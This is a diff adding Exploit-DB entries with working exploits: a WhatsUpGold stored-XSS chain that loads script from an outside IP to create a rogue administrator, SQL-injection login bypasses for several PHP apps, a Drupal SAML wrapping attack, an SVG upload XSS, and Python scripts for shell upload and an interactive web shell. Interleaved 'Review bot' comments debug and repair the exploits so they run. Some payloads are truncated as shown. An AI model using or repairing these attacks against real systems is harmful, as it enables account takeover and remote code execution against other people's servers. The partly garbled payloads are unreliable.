diff --git a/exploits/multiple/webapps/50366.txt b/exploits/multiple/webapps/50366.txt
new file mode 100644
index 000000000..88722e246
--- /dev/null
+++ b/exploits/multiple/webapps/50366.txt
@@ -0,0 +1,57 @@ +# Exploit Title: WhatsUpGold 21.0.3 - Stored Cross-Site Scripting (XSS) +# Date: 09.17.2021 +# Exploit Author: Andreas Finstad (4ndr34z) +# Vendor Homepage: https://www.whatsupgold.com +# Version: v.21.0.3, Build 188 +# Tested on: Windows 2019 Server +# CVE : CVE-2021-41318 +# Reference: https://f20.be/cves/poc-cve-2021-41318 + +Description: +Improper validation of strings from discovered SNMP devices, makes the application prone to stored XXS attacks. +Placing a XSS payload in one of the fields reflected onto the application, triggers the exploitation. +No CSRF protection/token on adding/posting a new user account, makes it possible to create a rouge administrator, using a staged javascript delivered through the XSS. + +SNMP A nix computer placed on a subnet accessible from the server for discovery, you edit the SNMPd.conf, adding the payload: + +# snmpd.conf +# An example configuration file for configuring the Net-SNMP agent ('snmpd') +# See snmpd.conf(5) man page for details +############################################################################ +# SECTION: System Information Setup +# syslocation: The [typically physical] location of the system. +# Note that setting this value here means that when trying to +# perform an snmp SET operation to the sysLocation.0 variable will make +# the agent return the "notWritable" error code. IE, including +# this token in the snmpd.conf file will disable write access to +# the variable. 
+# arguments: location_string +sysName Evil-Device +sysLocation Somewhere Over The Rainbow +sysContact + +This is the base64 encoded string: +var a=document.createElement("script");a.src="http://192.168.66.46/x.js";document.body.appendChild(a); + +x.js: +var vhost = window.location.protocol+'\/\/'+window.location.host +var username = "sysadmin" +var password = "me" + +fetch(vhost+'/NmConsole/api/core/WebUser',{ + method: 'POST', + headers: { + 'Content-Length': '479', + 'Accept': 'application/json', + 'X-Requested-With': 'XMLHttpRequest', + 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 Edg/90.0.818.51', + 'Content-Type': 'application/json', + 'Origin': vhost, + 'Referer': vhost+'/NmConsole/', + 'Accept-Encoding': 'gzip, deflate', + 'Accept-Language': 'nb,no;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6,sv;q=0.5,fr;q=0.4', + 'Connection': 'close' + }, + credentials: 'include', + body: '{"HomeDeviceGroupID":0,"HomeDeviceGroupPath":"My Network","LanguageID":1033,"UserRightsMask":"0","IsDgarConfigured":false,"Groups" [1],"WebUserID":-1,"UserName":"'+username+'","AuthenticationType":1,"ApplyWebUiSessionTimeout":true,"ApplyLockoutPolicy":false,"ApplyPasswordAging":false,"ApplyPasswordComplexity":false,"ApplySessionPolicy":false,"FailedLoginCount":0,"IsLocked":false,"Password":"'+password+'","UnlockUser":false,"WebConfigurationSettings":"","id":"Wug.model.userManagement.WebUser-2"}' +}); \ No newline at end of file diff --git a/exploits/php/webapps/50360.txt b/exploits/php/webapps/50360.txt new file mode 100644 index 000000000..7976201b5 --- /dev/null +++ b/exploits/php/webapps/50360.txt 
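Review bot: The POST body in x.js is not valid JSON as printed — `"Groups" [1]` has no colon between key and value — so the WebUser endpoint would reject the request before any account is created; building the body from an object and passing it through JSON.stringify fixes that and also removes the hard-coded `'Content-Length': '479'`, which goes stale the moment username or password is changed. Several of the listed headers (Content-Length, Connection, Accept-Encoding, Origin, Referer) are forbidden request headers that browsers drop silently from fetch(), so listing them only obscures what is actually sent. The `sysContact` line is empty and the loader is described as base64-encoded while only the decoded JavaScript is shown, so the delivery step — the exact string placed in snmpd.conf and how the page decodes and executes it — is not reproducible from this file as rendered and should be spelled out.
```javascript
var vhost = window.location.protocol + '//' + window.location.host;
var body = {
  HomeDeviceGroupID: 0, HomeDeviceGroupPath: "My Network", LanguageID: 1033,
  UserRightsMask: "0", IsDgarConfigured: false, Groups: [1], WebUserID: -1,
  UserName: username, AuthenticationType: 1, ApplyWebUiSessionTimeout: true,
  ApplyLockoutPolicy: false, ApplyPasswordAging: false, ApplyPasswordComplexity: false,
  ApplySessionPolicy: false, FailedLoginCount: 0, IsLocked: false, Password: password,
  UnlockUser: false, WebConfigurationSettings: "", id: "Wug.model.userManagement.WebUser-2"
};
fetch(vhost + '/NmConsole/api/core/WebUser', {
  method: 'POST',
  headers: { 'Accept': 'application/json', 'X-Requested-With': 'XMLHttpRequest', 'Content-Type': 'application/json' },
  credentials: 'include',
  body: JSON.stringify(body)
});
```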
@@ -0,0 +1,35 @@
+# Exploit Title: Exam Form Submission System 1.0 - SQL Injection Authentication Bypass
+# Date: 30-09-2021
+# Exploit Author: Nitin Sharma (Vidvansh)
+# Vendor Homepage: https://code-projects.org
+# Product link: https://code-projects.org/exam-form-submission-in-php-with-source-code/
+# Version: 1.0
+# Tested on: XAMPP / Windows 10
+
+Steps-To-Reproduce:
+Step 1 Go to the Product admin panel http://localhost/EXAM_FORM_SUBMISSION/admin/index.php.
+Step 2 – Enter anything in username and password
+Step 3 – Click on Login and capture the request in the burp suite
+Step4 – Change the username to ' OR 1 -- - and password to ' OR 1 -- -.
+Step 5 – Click forward and now you will be logged in as admin.
+
+POC
+POST /EXAM_FORM_SUBMISSION/admin/index.php HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-GB,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 40
+Origin: http://localhost
+Connection: close
+Referer: http://localhost/EXAM_FORM_SUBMISSION/admin/index.php
+Cookie: PHPSESSID=2fa01e7lg9vfhtspr2hs45va76
+Upgrade-Insecure-Requests: 1
+Sec-Fetch-Dest: document
+Sec-Fetch-Mode: navigate
+Sec-Fetch-Site: same-origin
+Sec-Fetch-User: ?1
+
+email='%20OR%201%20--%20-&pass='%20OR%201%20--%20-&Login=Login
\ No newline at end of file
diff --git a/exploits/php/webapps/50361.txt b/exploits/php/webapps/50361.txt
new file mode 100644
index 000000000..ed15e7644
--- /dev/null
+++ b/exploits/php/webapps/50361.txt
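Review bot: The captured request cannot be replayed as written: `Content-Length: 40` does not match the 62-byte body `email='%20OR%201%20--%20-&pass='%20OR%201%20--%20-&Login=Login`, so any client or proxy honouring the header truncates the payload in the middle of the injection; either drop the header or set `Content-Length: 62`. The steps speak of a "username" field while the request uses `email` and `pass`, and the two should agree. A one-line note naming the query in admin/index.php that concatenates the submitted email (presumably via `$_POST['email']`, not visible here) would tell readers which parameter carries the injection; as described, the `pass` payload only matters if the password is compared in SQL rather than hashed before the query.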
@@ -0,0 +1,115 @@ +# Exploit Title: Drupal Module MiniorangeSAML 8.x-2.22 - Privilege escalation via XML Signature Wrapping +# Date: 09/07/2021 +# Exploit Author: Cristian 'void' Giustini +# Vendor Homepage: https://www.miniorange.com/ +# Software Link: https://www.drupal.org/project/miniorange_saml +# Version: 8.x-2.22 (REQUIRED) +# Tested on: Linux Debian (PHP 8.0.7 with Apache/2.4.38) +# Original article: https://blog.hacktivesecurity.com/index.php/2021/07/09/sa-contrib-2021-036-notsosaml-privilege-escalation-via-xml-signature-wrapping-on-minorangesaml-drupal-plugin/ +# Drupal Security Advisory URL: https://www.drupal.org/sa-contrib-2021-036 + +--- + +The MiniorangeSAML Drupal Plugin v. 8.x-2.22 is vulnerable to XML +Signature Wrapping Attacks that could allows an attacker to perform +privilege escalation attacks. + +In order to exploit the vulnerability, the plugin must be configured +with the "Either SAML reponse or SAML assertion must be signed" options +enabled and an empty "x509 certificate". 
+ +Administrator point of view: + +- Install a Drupal version (for the PoC the version 9.1.10 has been used) + +- Configure an external SSO system like Auth0 + +- Configure the plugin with the Auth0 provider by checking the "Either +SAML response or SAML assertion must be signed" and empty "x509 certificate" + + +Attacker point of view: + +- Register a normal user on the website + +- Perform a login + +- Intercept the request with Burp Suite and decode the SAMLResponse +parameter + +- Inject an additional object before the original one +(example here: +https://gist.github.com/voidz0r/30c0fb7be79abf8c79d1be9d424c9e3b#file-injected_object-xml) +(SAMLRaider Burp extension, XSW3 payload) + + + urn:miniorange-research.eu.auth0.com + + admin + + + + + + + http://localhost:8080 + + + + urn:oasis:names:tc:SAML:2.0:ac:classes:unspecified + + + + + admin + + + test@example.com + + + test@example.com + + + test@example.com + + + Username-Password-Authentication + + + auth0 + + + false + + + 8bbK44pPnBAqzN49pSuwmgdhgsZavkNI + + + Wed Jun 23 2021 21:01:51 GMT+0000 (Coordinated Universal Time) + + + false + + + test + + + https://s.gravatar.com/avatar/55502f40dc8b7c769880b10874abc9d0?s=480&r=pg&d=https%3A%2F%2Fcdn.auth0.com%2Favatars%2Fte.png + + + + Wed Jun 23 2021 21:01:51 GMT+0000 (Coordinated Universal Time) + + + + + + + +- Replace the username with one with higher privileges (like admin) + +- Submit the request + +- Successful exploitation \ No newline at end of file diff --git a/exploits/php/webapps/50362.txt b/exploits/php/webapps/50362.txt new file mode 100644 index 000000000..0400ecc25 --- /dev/null +++ b/exploits/php/webapps/50362.txt 
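Review bot: The injected XML object that makes this PoC work is only linked to an external gist, and the inline copy has lost its markup as rendered here (only bare text values such as `admin` and `urn:oasis:names:tc:SAML:2.0:ac:classes:unspecified` survive), so the file is not self-contained; the injected object should be included inline with its element names intact. The sample also carries what looks like a live Auth0 tenant identifier (`urn:miniorange-research.eu.auth0.com`) and an opaque 32-character value that may be a client ID or secret — both should be replaced with placeholders before publication. It would also help to state why an empty "x509 certificate" is a precondition: the reviewer's reading is that signature presence is checked but no trust anchor exists to verify it against, which should be confirmed against the advisory rather than left implicit.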
@@ -0,0 +1,40 @@
+# Exploit Title: Blood Bank System 1.0 - SQL Injection / Authentication Bypass
+# Date: 30-9-2021
+# Exploit Author: Nitin Sharma (vidvansh)
+# Vendor Homepage: https://code-projects.org/blood-bank-in-php-with-source-code/
+# Software Link : https://download.code-projects.org/details/f44a4ba9-bc33-48c3-b030-02f62117d230
+# Version: 1.0
+# Tested on: Windows 10 , Apache , Mysql
+
+# Description : Password input is affected with authentication bypass because of improper sanitisation which lead to access to auauthorised accounts.
+
+#Steps-To-Reproduce:
+Step 1 Go to the Product admin panel http://localhost/bloodbank/login.php.
+Step 2 – Enter anything in username and password
+Step 3 – Click on Login and capture the request in the burp suite
+Step4 – Change the username to ' OR 1 -- - and password to ' OR 1 -- -.
+Step 5 – Click forward and now you will be logged in as admin.
+
+# PoC:
+
+GET /bloodbank/file/../bloodrequest.php?msg=Gandhi%20hospital%20have%20logged%20in. HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-GB,en;q=0.5
+Accept-Encoding: gzip, deflate
+Origin: http://localhost
+Connection: close
+Referer: http://localhost/bloodbank/login.php
+Cookie: PHPSESSID=2fa01e7lg9vfhtspr2hs45va76
+Upgrade-Insecure-Requests: 1
+Sec-Fetch-Dest: document
+Sec-Fetch-Mode: navigate
+Sec-Fetch-Site: same-origin
+Sec-Fetch-User: ?1
+
+# Authentication Bypass:
+
+# Go to admin login page (http://localhost/bloodbank/login.php), then use below payload as username and password =>
+Username: ** Random email**
+Password: ' or 1 -- -
\ No newline at end of file
diff --git a/exploits/php/webapps/50363.txt b/exploits/php/webapps/50363.txt
new file mode 100644
index 000000000..d7b40ec59
--- /dev/null
+++ b/exploits/php/webapps/50363.txt
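Review bot: The request shown under `# PoC:` is the post-login GET to `bloodrequest.php?msg=...logged in.`, not the injection itself, so the file never shows the POST to `login.php` that carries the payload; the captured login request, with the form's real field names, should replace it. The two payload descriptions also disagree: the steps put `' OR 1 -- -` in both username and password, while the closing section uses a random email plus `' or 1 -- -` in the password only — state once the variant that was actually verified. The `file/../` segment in the GET path is unexplained and looks like leftover traversal testing; either document it or remove it.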
@@ -0,0 +1,35 @@ +# Exploit Title: Phpwcms 1.9.30 - File Upload to XSS +# Date: 30/9/2021 +# Exploit Author: Okan Kurtulus | okankurtulus.com.tr +# Software Link: http://www.phpwcms.org/ +# Version: 1.9.30 +# Tested on: Ubuntu 16.04 + +Steps: + +1-) You need to login to the system. +http://target.com/phpwcms/login.php + +2-) Creating payload with SVG extension: payload.svg + + + + + + + + + + +3-) Go to the following link and upload the payload: +http://target.com/phpwcms/phpwcms.php?csrftoken=b72d02a26550b9877616c851aa6271be&do=files&p=8 + +From the menu: + +file -> multiple file upload -> Select files or drop here + +4-) After uploading payload, call it from the link below. + +http://192.168.1.112/phpwcms/upload/ \ No newline at end of file diff --git a/exploits/php/webapps/50364.py b/exploits/php/webapps/50364.py new file mode 100755 index 000000000..1967a03b5 --- /dev/null +++ b/exploits/php/webapps/50364.py 
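Review bot: The SVG payload body is missing from the file as rendered — step 2 shows only the filename followed by blank lines — so the XSS is not reproducible; the `payload.svg` contents should be included as text, e.g. `<svg xmlns="http://www.w3.org/2000/svg"><script>alert(document.domain)</script></svg>`, together with the full URL of the uploaded file rather than the bare `/phpwcms/upload/` directory. Step 3 embeds a session-specific `csrftoken=` value and step 4 switches from `target.com` to `192.168.1.112`; both should be placeholders. The write-up should also say which role can reach the multiple-file upload, since a stored XSS that only an administrator can plant in their own CMS has a much narrower impact than one reachable by low-privilege editors.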
@@ -0,0 +1,79 @@ +# Exploit Title: Vehicle Service Management System 1.0 - Remote Code Execution (RCE) (Unauthenticated) +# Date: 30.09.2021 +# Exploit Author: Fikrat Ghuliev (Ghuliev) +# Vendor Homepage: https://www.sourcecodester.com/php/14972/vehicle-service-management-system-php-free-source-code.html +# Software Link: https://www.sourcecodester.com/download-code?nid=14972&title=Vehicle+Service+Management+System+in+PHP+Free+Source+Code +# Version: 1.0 +# Tested on: Ubuntu + +import requests +from bs4 import BeautifulSoup +import sys +import random +import string +import time + +print(""" + +[+] Vehicle Service Management System + +[!] Auth bypass + shell upload = RCE + +""") + +time.sleep(2) +if len(sys.argv) != 4: + print("[~] Usage : python3 exploit.py localhost ip port") + exit() + +site = sys.argv[1] +ip = sys.argv[2] +port = sys.argv[3] +shellcode = "&3 2>&3'); ?>" + +letters = string.ascii_lowercase +name = ''.join(random.choice(letters) for i in range(5)) + +def LoginAndShellUpload(): + print("[+] Try Login") + time.sleep(1) + login = 'http://'+site+'/vehicle_service/admin/login.php' + session = requests.session() + post_data = {"username": "' OR 1=1-- -", "password": "aa"} + user_login = session.post(login, data=post_data) + cookie = session.cookies.get_dict() + + print('[+]Success login') + + print('[+]Try Shell upload') + time.sleep(2) + #shell upload + url = 'http://'+site+'/vehicle_service/classes/SystemSettings.php?f=update_settings' + cookies = cookie + headers = {"User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:92.0) Gecko/20100101 Firefox/92.0", "Accept": "*/*", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "X-Requested-With": "XMLHttpRequest", "Content-Type": "multipart/form-data; boundary=---------------------------34590800438205826044276614708", "Origin": "http://localhost", "Connection": "close", "Referer": "http://localhost/church_management/admin/?page=system_info", "Sec-Fetch-Dest": "empty", 
"Sec-Fetch-Mode": "cors", "Sec-Fetch-Site": "same-origin"} + data = "-----------------------------38784447663334447953661330489\r\nContent-Disposition: form-data; name=\"name\"\r\n\r\nVehicle Service Management System\r\n-----------------------------38784447663334447953661330489\r\nContent-Disposition: form-data; name=\"short_name\"\r\n\r\nVSMS - PHP\r\n-----------------------------38784447663334447953661330489\r\nContent-Disposition: form-data; name=\"about_us\"\r\n\r\n

About Us


Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nullam non ultrices tortor. Sed at ligula non lectus tempor bibendum a nec ante. Maecenas iaculis vitae nisi eu dictum. Duis sit amet enim arcu. Etiam blandit vulputate magna, non lobortis velit pharetra vel. Morbi sollicitudin lorem sed augue suscipit, eu commodo tortor vulputate. Interdum et malesuada fames ac ante ipsum primis in faucibus. Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Praesent eleifend interdum est, at gravida erat molestie in. Vestibulum et consectetur dui, ac luctus arcu. Curabitur et viverra elit. Cras ac eleifend ipsum, ac suscipit leo. Vivamus porttitor ac risus eu ultricies. Morbi malesuada mi vel luctus sagittis. Ut vestibulum porttitor est, id rutrum libero. Mauris at lacus vehicula, aliquam purus quis, pharetra lorem.

Proin consectetur massa ut quam molestie porta. Donec sit amet ligula odio. Class aptent taciti sociosqu ad litora torquent per conubia nostra, per inceptos himenaeos. Morbi ex sapien, pulvinar ac arcu at, luctus scelerisque nibh. In dolor velit, pellentesque eu blandit a, mollis ac neque. Fusce tortor lectus, aliquam et eleifend id, aliquet ut libero. Nunc scelerisque vulputate turpis quis volutpat. Vivamus malesuada sem in dapibus aliquam. Vestibulum imperdiet, nulla vitae pharetra pretium, magna felis placerat libero, quis tincidunt felis diam nec nisi. Sed scelerisque ullamcorper cursus. Suspendisse posuere, velit nec rhoncus cursus, urna sapien consectetur est, et lacinia odio leo nec massa. Nam vitae nunc vitae tortor vestibulum consequat ac quis risus. Sed finibus pharetra orci, id vehicula tellus eleifend sit amet.

Morbi id ante vel velit mollis egestas. Suspendisse pretium sem urna, vitae placerat turpis cursus faucibus. Ut dignissim molestie blandit. Phasellus pulvinar, eros id ultricies mollis, lectus velit viverra mi, at venenatis velit purus id nisi. Duis eu massa lorem. Curabitur sed nibh felis. Donec faucibus, nulla at faucibus blandit, mi justo efficitur dui, non mattis nisl purus non lacus. Maecenas vel congue tellus, in convallis nisi. Curabitur faucibus interdum massa, eu facilisis ligula pretium quis. Nunc eleifend orci nec volutpat tincidunt.

Ut et urna sapien. Nulla lacinia sagittis felis id cursus. Etiam eget lacus quis enim aliquet dignissim. Nulla vel elit ultrices, venenatis quam sed, rutrum magna. Pellentesque ultricies non lorem hendrerit vestibulum. Maecenas lacinia pharetra nisi, at pharetra nunc placerat nec. Maecenas luctus dolor in leo malesuada, vel aliquet metus sollicitudin. Curabitur sed pellentesque sem, in tincidunt mi. Aliquam sodales aliquam felis, eget tristique felis dictum at. Proin leo nisi, malesuada vel ex eu, dictum pellentesque mauris. Quisque sit amet varius augue.

Sed quis imperdiet est. Donec lobortis tortor id neque tempus, vel faucibus lorem mollis. Fusce ut sollicitudin risus. Aliquam iaculis tristique nunc vel feugiat. Sed quis nulla non dui ornare porttitor eu vitae nisi. Curabitur at quam ut libero convallis mattis vel eget mauris. Vivamus vitae lectus ligula. Nulla facilisi. Vivamus tristique maximus nulla, vel mollis felis blandit posuere. Curabitur mi risus, rutrum non magna at, molestie gravida magna. Aenean neque sapien, volutpat a ullamcorper nec, iaculis quis est.

\r\n-----------------------------38784447663334447953661330489\r\nContent-Disposition: form-data; name=\"files\"; filename=\"\"\r\nContent-Type: application/octet-stream\r\n\r\n\r\n-----------------------------38784447663334447953661330489\r\nContent-Disposition: form-data; name=\"img\"; filename=\""+name+".php\"\r\nContent-Type: application/x-php\r\n\r\n"+shellcode+"\n\n\r\n-----------------------------38784447663334447953661330489\r\nContent-Disposition: form-data; name=\"cover\"; filename=\"\"\r\nContent-Type: application/octet-stream\r\n\r\n\r\n-----------------------------38784447663334447953661330489--\r\n" + + requests.post(url, headers=headers, cookies=cookies, data=data) + print('[+]Success!') + print('[+]Getting reverse shell') + time.sleep(2) + + + + + +def RCE(): + + path = 'http://'+site+'/vehicle_service/uploads/' + html_text = requests.get(path).text + soup = BeautifulSoup(html_text, 'html.parser') + for link in soup.find_all('a'): + data = link.get('href') + if ".php" in data: + r = requests.get('http://'+site+'/vehicle_service/uploads/'+data) + print('[+]Pwned!') + + + +LoginAndShellUpload() +RCE() \ No newline at end of file diff --git a/exploits/php/webapps/50365.txt b/exploits/php/webapps/50365.txt new file mode 100644 index 000000000..ec11ec46d --- /dev/null +++ b/exploits/php/webapps/50365.txt 
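Review bot: The multipart boundary declared in the Content-Type header (`---------------------------34590800438205826044276614708`) is not the boundary used in the hand-built body (`-----------------------------38784447663334447953661330489`), so PHP cannot parse the upload and the `img` file is never written; letting requests build the multipart body from `files=` fixes this and removes the brittle raw string. `LoginAndShellUpload` prints "Success login" and "Success!" without inspecting either response, and `RCE()` requests every .php under `/uploads/` and prints "Pwned!" unconditionally, so a failed login or upload is invisible. The `shellcode` string is truncated as rendered here (it begins at `&3 2>&3'); ?>`) and the `ip`/`port` arguments are read but never used in what is visible, so the reverse-shell part should be checked against the original file; the Referer also still points at `church_management`.
```python
# … unchanged: argument parsing, session creation and login POST …
files = {"img": (name + ".php", shellcode, "application/x-php")}
data = {"name": "Vehicle Service Management System", "short_name": "VSMS - PHP", "about_us": "about"}
headers = {"X-Requested-With": "XMLHttpRequest"}
resp = session.post(url, headers=headers, files=files, data=data)
resp.raise_for_status()
print('[+]Success!')
```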
@@ -0,0 +1,32 @@
+# Exploit Title: Dairy Farm Shop Management System 1.0 - SQL Injection Authentication Bypass
+# Date: 2021-09-30
+# Exploit Author: sanjay singh
+# Vendor Homepage: https://phpgurukul.com/
+# Software Link: https://phpgurukul.com/dairy-farm-shop-management-system-using-php-and-mysql/
+# Version: v1.0
+# Tested on: Windows 10
+
+Steps-To-Reproduce:
+Step 1 Go to the Product admin panel http://localhost/dfsms/index.php.
+Step 2 – Enter anything in username and password
+Step 3 – Click on Login and capture the request in the burp suite
+Step 4 – Change the username to admin' or '1'='1 and password to dfsms
+Step 5 – Click forward and now you will be logged in as admin.
+
+POC
+
+POST /dfsms/index.php HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 57
+Origin: http://localhost
+Connection: close
+Referer: http://localhost/dfsms/index.php
+Cookie: PHPSESSID=hgjvarn4tie1nmsufdn8mf1hrl
+Upgrade-Insecure-Requests: 1
+
+username=admin%27+or+%271%27%3D%271&password=dfsms&login=
\ No newline at end of file
diff --git a/exploits/php/webapps/50367.py b/exploits/php/webapps/50367.py
new file mode 100755
index 000000000..180b52ce9
--- /dev/null
+++ b/exploits/php/webapps/50367.py
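Review bot: Step 4 tells the reader to set the password to `dfsms` without saying why, but with `admin' or '1'='1` in the username the predicate becomes `username='admin' or '1'='1' and password='...'`, and because AND binds tighter than OR the password value is irrelevant as long as a user named `admin` exists; the write-up should say so, otherwise readers take `dfsms` for a required default credential. That reading assumes the usual concatenated `... where username='$u' and password='$p'` query, which is not shown here and should be confirmed against the source. Note that a bare `' or '1'='1` in the username would instead depend on the password clause, so the `admin` prefix is what makes this particular payload work.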
@@ -0,0 +1,189 @@ +# Exploit Title: CMSimple_XH 1.7.4 - Remote Code Execution (RCE) (Authenticated) +# Date: 01-10-2021 +# Exploit Author: Halit AKAYDIN (hLtAkydn) +# Vendor Homepage: https://www.cmsimple-xh.org/ +# Software Link: https://www.cmsimple-xh.org/?Downloads +# Version: 1.7.4 +# Category: Webapps +# Tested on: Linux/Windows + + +# CMSimple_XH is an open source project under GPL3 license +# Includes an endpoint that allows remote access +# Backup page is misconfigured, causing security vulnerability +# User information with sufficient permissions is required. + +# Example: python3 exploit.py -u http://example.com -p Admin123 + + + +from bs4 import BeautifulSoup +from time import sleep +import requests +import argparse + + +def main(): +parser = argparse.ArgumentParser(description='CMSimple_XH Version 1.7.4 - Remote Code Execution (Authenticated)') +parser.add_argument('-u', '--host', type=str, required=True) +parser.add_argument('-p', '--password', type=str, required=True) +args = parser.parse_args() +print("\nCMSimple_XH Version 1.7.4 - Remote Code Execution (Authenticated)", +"\nExploit Author: Halit AKAYDIN (hLtAkydn)\n") +host(args) + + + +def host(args): +#Check http or https +if args.host.startswith(('http://', 'https://')): +print("[?] Check Url...\n") +sleep(2) +args.host = args.host +if args.host.endswith('/'): +args.host = args.host[:-1] +else: +pass +else: +print("\n[?] 
Check Adress...\n") +sleep(2) +args.host = "http://" + args.host +args.host = args.host +if args.host.endswith('/'): +args.host = args.host[:-1] +else: +pass + + +# Check Host Status +try: +response = requests.get(args.host) +if response.status_code == 200: +login(args) +else: +print("[-] Address not reachable!") +sleep(2) + +except requests.ConnectionError as exception: +print("[-] Address not reachable!") +sleep(2) +exit(1) + + +def login(args): + +url = args.host + "/?&login" +cookies = { +"XH_2f": "evil" +} +headers = { +"Origin": args.host, +"Content-Type": "application/x-www-form-urlencoded", +"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0", +"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", +"Referer": args.host + "/?&login" +} +data = { +"login": "true", +"keycut": args.password, +"submit": "Login" +} +response = requests.post(url, headers=headers, cookies=cookies, data=data) + +token = response.cookies.get("XH_2f") +soup = BeautifulSoup(response.text, 'html.parser') + +if (soup.find("link",{"rel":"next"})['href'] != "/"): +print("[!] Login Success!\n") +sleep(2) +csrf(args,token) +else: +print("[!] 
Wrong password!!\n") +sleep(2) + + +def csrf(args, token): + +url = args.host + "/?file=content" +cookies = { +"status": "adm", +"XH_2f": token +} +headers = { +"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0", +"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", +"Referer": args.host + "/?&settings", +"Accept-Encoding": "gzip, deflate", +"Connection": "close" +} +response = requests.get(url, headers=headers, cookies=cookies) + +try: +soup = BeautifulSoup(response.text, 'html.parser') +csrf = soup.find_all("input", type="hidden")[3].get("value") +create(args, token, csrf) +except Exception as e: +print(e) +else: +pass + + + +def create(args, token, csrf): + +payload = "\r\n" + +url = args.host +cookies = { +"status": "adm", +"XH_2f": token +} +headers = { +"Origin": args.host, +"Content-Type": "application/x-www-form-urlencoded", +"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0", +"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", +"Referer": args.host + "/?file=content&action=edit&xh_success=content", +"Accept-Encoding": "gzip, deflate" +} +data = { +"text": payload, +"file": "content", +"action": "save", +"xh_csrf_token": csrf +} +response = requests.post(url, headers=headers, cookies=cookies, data=data, allow_redirects=True) + +if (response.status_code == 200): +print("[!] Create Vuln File!\n") +sleep(2) +exploit(args) +else: +print("[!] 
Create Failed!\n") +sleep(2) + + +def exploit(args): + +print("[+] Exploit Done!\n") +sleep(2) + +while True: +cmd = input("$ ") +url = args.host + "/evil.php?cmd=" + cmd +headers = { +"Upgrade-Insecure-Requests": "1", +"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0" +} + +response = requests.post(url, headers=headers, timeout=5) + +if response.text == "": +print(cmd + ": command not found\n") +else: +print(response.text) + + + +if __name__ == '__main__': +main() \ No newline at end of file diff --git a/exploits/php/webapps/50370.txt b/exploits/php/webapps/50370.txt new file mode 100644 index 000000000..eca3e3cc4 --- /dev/null +++ b/exploits/php/webapps/50370.txt 
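Review bot: `csrf()` picks the token by position (`soup.find_all("input", type="hidden")[3]`), which silently grabs the wrong field if the settings form gains or loses a hidden input; select it by name instead: `csrf = soup.find("input", {"name": "xh_csrf_token"})["value"]`. In `exploit()` the command is concatenated into the URL unencoded and sent with `requests.post`, so any `&`, `#` or space in `cmd` breaks the request; use `response = requests.get(args.host + "/evil.php", params={"cmd": cmd}, headers=headers, timeout=5)`. The PHP `payload` is empty as rendered here (`"\r\n"`) and nothing visible explains how saving it as `content` produces `/evil.php` — the header only says the backup page is misconfigured — so the write-up should spell out that step. `login()` also raises a TypeError rather than reporting a bad password when no `rel="next"` link is present, and `create()` treats any 200 after redirects as success.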
@@ -0,0 +1,32 @@
+# Exploit Title: Directory Management System 1.0 - SQL Injection Authentication Bypass
+# Date: 2021-10-01
+# Exploit Author: SUDONINJA
+# Vendor Homepage: https://phpgurukul.com/
+# Software Link: https://phpgurukul.com/directory-management-system-using-php-and-mysql/
+# Version: v1.0
+# Tested on: Windows 10
+
+Steps-To-Reproduce:
+Step 1 Go to the Product admin panel http://localhost/dfsms/index.php.
+Step 2 – Enter anything in username and password
+Step 3 – Click on Login and capture the request in the burp suite
+Step 4 – Change the username to admin' or '1'='1 and password to dfsms
+Step 5 – Click forward and now you will be logged in as admin.
+
+POC
+
+POST /dms/admin/ HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 83
+Origin: http://localhost
+Connection: close
+Referer: http://localhost/dms/admin/
+Cookie: PHPSESSID=hgjvarn4tie1nmsufdn8mf1hrl
+Upgrade-Insecure-Requests: 1
+
+username=admin%27+or+%271%27%3D%271&password=admin%27+or+%271%27%3D%271&login=login
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 8195d2224..1f23e49e8 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
